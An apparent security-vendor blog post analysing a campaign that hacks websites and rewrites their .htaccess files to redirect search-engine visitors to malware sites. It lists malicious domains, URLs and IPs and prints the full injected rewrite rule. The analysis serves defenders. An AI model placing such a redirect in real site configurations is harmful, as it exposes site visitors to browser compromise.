We have been talking about .htaccess redirections for a while. A site gets compromised and the attackers modify the .htaccess file(s) to redirect any search engine traffic to a different (malicious) page that attempts to compromise the browser / computer of anyone visiting the site.
For the most part, the attackers have been using .ru domains to distribute the malware. Here are some of the domains used:
face-apple.ru
fightagent.ru
power-update.ru
syntaxswitch.ru
window-switch.ru
There are hundreds of others, however, we are now seeing a shift where most of the domains being used are in the .in TLD. Check out our Global Malware View to see a bit more detail:
http://setting-appic.in/filter/index.php
http://settingappic.in/ecran/index.php
http://appicsetting.in/riba/index.php
http://geografycsturtup.in/apoz/index.php
http://mistyc-faraon.in/mudio/index.php
http://settingappic.in/ecran/index.php (95.163.89.204)
http://loginnewman.in/vooz/index.php
http://pills.ind.in/in.cgi?4 (184.107.238.26)
http://security-tvoya.in/banan/index.php (66.197.168.198)
http://software-mahalai.in/fason/index.php (66.197.168.198)
http://payment-glonas.in/position/index.php
http://masaskisoft.in/ahalai/index.php (66.197.168.199)
http://assistantbilling.in/proccess/index.php (64.120.151.70)
.. and more..
The .htaccess modifications being made by the attacks are a now a little different as well:
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|
netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|
metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|
yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|
webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|
entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|
teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|
metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|
galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|
fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|
abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|
suchmaschine|web-archiv|web|websuche|witch|wolong|oekoportal|t-online|
freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|
kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|
bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|
ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|
findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|
kingdomseek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|
uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|
findloo|kobala|limier|express|bestireland|browseireland|iesearch|
ireland-information|kompass|startsiden|confex|finnalle|gulesider|
keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|
chapu|claymont|clickz|clush|ehow|findhow|icq|goo|
westaustraliaonline).(.*)RewriteRule ^(.*)$ http://settingappic.in/ecran/index.php [R=301,L]
They are listing a lot of major sites/search engines, and redirecting visitors that come in from those sites.
How are sites getting hacked?
Most redirect malware cases we see can be attributed (attack vector) to outdated software(WordPress, Joomla, Timthumb, etc), or your exploited FTP/SFTP (Infected local machines).
Is your site hacked? Scan it here to verify: http://sitecheck.sucuri.net or sign up here to get it cleaned.
Denis Sinegubko
Marc-Alexandre Montpas
Rianna MacLeod
Fernando Barbosa
Luke Leal
Cesar Anjos
Ben Martin
2 comments
Great post. Thank you for sharing. I found the Global Malware View very useful also.
Thanks for sharing. Our partner site from Bhutan has been hacked by hacker from Iraq. We help upgrade and hardening their wordpress.
Comments are closed.